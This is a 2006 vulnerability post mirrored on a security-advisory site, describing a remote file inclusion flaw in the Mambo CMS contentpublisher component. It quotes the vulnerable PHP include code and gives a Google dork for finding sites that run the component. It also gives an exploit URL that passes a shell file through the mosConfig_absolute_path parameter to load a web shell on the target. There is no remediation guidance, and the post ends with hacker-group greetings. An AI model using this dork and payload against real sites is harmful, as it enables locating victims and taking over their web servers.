Computer Security

Security Advisory: contentpublisher Mambo Component Remote File Include Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:21.08.2006
Subject:contentpublisher Mambo Component Remote File Include Vulnerabilities

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : contentpublisher Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------


Google Dorks  : inurl:"/com_contentpublisher/"

------------------------- -------------------------------------------------------

Application :  contentpublisher/  Component of Mambo

--------------------------------------------------------------------------------


Bug İn contentpublisher.php

global $my, $mosConfig_live_site, $mosConfig_lang;

if (file_exists($mosConfig_absolute_path.
'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.
php')) {
   include($mosConfig_absolute_path.
'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.
php');
} else {
   include($mosConfig_absolute_path.
'/components/com_contentpublisher/languages/english.php');
}

--------------------------------------------------------------------------------


Exploit:

http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.
php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------


greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------



--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server